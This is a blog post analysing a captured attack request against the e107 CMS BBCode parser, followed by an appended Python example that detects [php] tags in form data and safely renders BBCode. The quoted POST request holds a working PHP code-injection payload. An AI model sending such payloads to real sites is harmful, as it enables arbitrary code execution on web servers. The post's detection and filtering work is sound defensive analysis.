Monday, October 18, 2010

BBCode Remote PHP Code Execution Vulnerability

While analyzing suspicious web application traffic, I came across this request payload:

POST /home.php/contact.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: my.calstateteach.net
User-Agent: MaMa CaSpEr
Content-Type: application/x-www-form-urlencoded
Content-Length: 97


send-contactus=1&author_name=[php]echo('casper'.php_uname().'kae');die();[/php]

Looking more closely at the payload, I saw that while it looks like PHP code injection (the use of “echo”, “php_uname” and “die()” are good indications of that), this code injection doesn’t start with the expected PHP declaration “<?php”. Instead, it targets a vulnerability in the BBCode parser discovered in the e107 content management system. This vulnerability allows a malicious user to execute arbitrary and malicious PHP code in the context of the web server process.

What does BBCode stand for?
No, it’s got nothing to do with BBC – the British Broadcasting Corporation. Bulletin Board Code or BBCode is a lightweight markup language used to format posts in many message boards. The available tags are usually indicated by square brackets surrounding a keyword, and they are parsed by the message board system before being translated into a markup language that web browsers understand—usually HTML or XHTML.

Food for thought
Since I am always looking for ways to protect web applications from content injection attacks (e.g. comment spamming, stored XSS or HTML injection), this leads me to the conclusion that web application security filters should also be aware of other (non-HTML) markup languages and be able to protect the application from such attacks.
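As an added example in the spirit of that conclusion (not code from this post or from e107), the Python below parses a form body, reports any field carrying an executable BBCode tag such as [php], and renders BBCode with a whitelist so that unknown tags stay literal text. The tag sets and the sample body are assumptions constructed for the example.

```python
import html
import re
from urllib.parse import unquote_plus

SAFE_TAGS = {"b", "i", "u"}   # assumed whitelist: tags that map 1:1 to HTML elements
EXEC_TAGS = {"php"}           # tags whose body is handed to an interpreter, not to HTML
TAG_RE = re.compile(r"\[(/?)([A-Za-z]+)(?:=[^\]]*)?\]")  # [tag], [/tag], [tag=value]


def parse_form_body(body: str) -> dict:
    """Split an application/x-www-form-urlencoded body into field -> [values]."""
    fields = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        fields.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return fields


def find_exec_tags(text: str) -> list:
    """Return the executable BBCode tag names present in one field value."""
    return sorted({m.group(2).lower() for m in TAG_RE.finditer(text)
                   if m.group(2).lower() in EXEC_TAGS})


def scan_form_body(body: str) -> dict:
    """Map each field that carries an executable BBCode tag to the tags found."""
    findings = {}
    for field, values in parse_form_body(body).items():
        hits = sorted({t for v in values for t in find_exec_tags(v)})
        if hits:
            findings[field] = hits
    return findings


def render_bbcode(text: str) -> str:
    """Render BBCode to HTML: whitelisted tags become elements, all else is escaped text."""
    out, pos = [], 0
    for m in TAG_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        closing, name = m.group(1) == "/", m.group(2).lower()
        if name in SAFE_TAGS:
            out.append(f"</{name}>" if closing else f"<{name}>")
        else:
            out.append(html.escape(m.group(0)))  # unknown tag stays literal, never interpreted
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)


# Constructed sample, mirroring the captured request body above.
SAMPLE_BODY = "send-contactus=1&author_name=[php]echo('casper'.php_uname().'kae');die();[/php]"
```

Running scan_form_body(SAMPLE_BODY) flags the author_name field, while render_bbcode leaves the [php] tag as inert text.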

